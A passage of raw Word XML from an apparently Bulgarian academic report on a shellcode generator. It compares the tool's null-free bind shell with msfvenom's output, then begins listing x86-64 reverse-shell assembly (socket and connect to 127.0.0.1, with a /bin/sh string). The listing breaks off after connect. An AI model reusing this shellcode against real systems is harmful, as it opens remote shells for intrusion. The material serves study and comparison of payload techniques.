      <w:bookmarkStart w:id="197" w:name="_ytzil4opws7e" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="197"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00C61194" w:rsidRDefault="005F56EB" w:rsidP="00C61194">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="198" w:name="_40lq8vxbc886" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="198"/>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bind shell от msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Разработваният инструмент генерира 77 байта, като няма нулеви. Размерът на изхода от msfvenom е 86 байта - 10% повече, но със значително </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>повече функционалн</w:t>
      </w:r>
      <w:r>
        <w:t>ост - извършват се осем стъпки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>socket()</w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>bind()</w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>listen()</w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>accept()</w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>dup2()</w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>dup2()</w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>dup2()</w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>execve()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>, които са по-близки до тези на reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:bookmarkStart w:id="199" w:name="_7sswabp2o3y0" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="199"/>
      <w:r w:rsidRPr="00112660">
        <w:t>Кодът на разработвания инструмент полага усилия за елиминирането на нулеви байтове. Така може да бъде използван самостоятелно без енкодер, но добавя много инструкции за спазването на това изискване. Msfvenom разчита, че ще има има някакво последващо кодиране и не се занимава с такива усложнения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Друга отличителна разлика е директното записване на информация на стека. Инструментът използва </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> инструкция за подминаване на неизпълнимата информация и </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>leaq</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> за зареждане на адреса. Освен това седем байтовата инструкция </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>leaq</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> се изпълнява няколко пъти с малка разлика в резултата. Msfvenom иползва </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>movabs</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>push + mov %rsp</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> (в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">т. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref2191094 \r \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>4.4.1.9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">), което в случая е по-оптимално решение. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="200" w:name="_cbl2tsjixqod" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="201" w:name="_Toc3540807"/>
      <w:bookmarkEnd w:id="200"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Reverse</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="201"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:bookmarkStart w:id="202" w:name="_xcrlmobw7fak" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="202"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">В този случай </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>има абсолютно идентични реализации. С разработения инструмент може да се генерира reverse shell с последователността generate -&gt; amd64 -&gt; append a module -&gt; socket -&gt; append a module -&gt; connect -&gt; append a module -&gt; dup2 -&gt; append a module -&gt; dup2 -&gt; append a module -&gt; dup2 -&gt; append a module -&gt; execve -&gt; build с параметри по подразбиране освен при втория и третия dup2, където е са съответно 1 и 2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E60F7" w:rsidRPr="00112660" w:rsidRDefault="005E60F7" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>.global _start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>.text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>_start:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>jmp begin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>sockaddr:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>#AF_INET</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.byte 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.byte 0xff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.word 4391</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.long 0xffffffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.byte 127</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.byte 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.byte 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.byte 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>addr:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>.quad 0xffffffffffffffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>addr_eol:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.quad 0xffffffffffffffff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>sh:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.ascii "/bin/sh"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>sh_eol:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>.byte 0xff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>begin:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># socket(AF_INET, SOCK_STREAM, 0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># sys_socket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %eax, %eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $41, %al</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># AF_INET</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %edi, %edi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $2, %dil</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># SOCK_STREAM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %esi, %esi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $1, %sil</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># no arguments</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %edx, %edx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># move the socket to first argument</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movl %eax, %edi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># connect(fd, &amp;sockaddr, 16)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># sys_connect</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %eax, %eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $42, %al</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>leaq sockaddr(%rip), %rsi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %edx, %edx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># put zeroes in sockaddr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movq %rsi, %r8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>inc %r8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb %dl, (%r8)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>addq $3, %r8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movl %edx, (%r8)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># sizof(struct sockaddr)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $16, %dl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:keepNext w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="005E60F7">
